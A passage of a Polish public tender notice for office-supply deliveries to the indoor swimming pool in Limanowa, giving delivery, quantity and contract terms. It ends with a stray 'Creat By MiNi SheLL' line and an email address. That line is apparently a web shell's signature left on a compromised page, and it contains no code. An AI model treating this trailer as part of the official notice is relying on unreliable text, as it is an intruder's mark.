Artykuły biurowe będą dostarczane partiami do budynku Krytej Pływalni w Limanowej, ul. Zygmunta Augusta 37 w miesięcznych odstępach czasowych lub w razie potrzeby na każde żądanie Zamawiającego, przez Wykonawcę, który jest zobowiązany do pokrycia  wszystkich kosztów z tym związanych.
Rodzaj i ilość asortymentu w ramach dostarczonej partii poszczególnych towarów wskazuje Zamawiający mailowo lub faksem, na 7 dni przed dostawą, a w przypadku zamówień o charakterze nagłym na 2 dni przed terminem dostawy.
Przewidywane roczne zapotrzebowanie zostało wykazane w załączniku 4 do niniejszej specyfikacji (kalkulacja cenowa dla zadania częściowego nr 4). Wskazane ilości są wielkościami szacunkowymi ustalonymi na podstawie zużycia w roku 2011 oraz przewidywanego zapotrzebowania dla okresu trwania umowy i mogą być niższe lub wyższe w poszczególnych asortymentach w zależności od bieżących potrzeb Zamawiającego. 
Wykonawca zobowiązuje się do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu (w granicach podpisanej kwoty umowy). 
Zamawiający wymaga, aby dostarczany asortyment na produkcie lub opakowaniu był opatrzony nazwa - logiem producenta. 
Dostarczony asortyment towaru, do którego Zamawiający będzie mieć zastrzeżenia zostanie zwrócony Wykonawcy, który jest zobowiązany do wymiany na nowy na swój koszt. 
Zamawiający zastrzega sobie prawo do ograniczenia zakupu do wysokości posiadanych środków.
W przypadku zwiększenia zamówienia w okresie trwania umowy ceny za poszczególne produkty pozostają bez zmian..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.95.00-5, 30.19.92.30-1, 22.81.00.00-1, 22.60.00.00-6, 22.80.00.00-8, 30.19.94.10-7, 22.99.00.00-6, 30.19.00.00-7, 22.90.00.00-9, 30.19.76.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com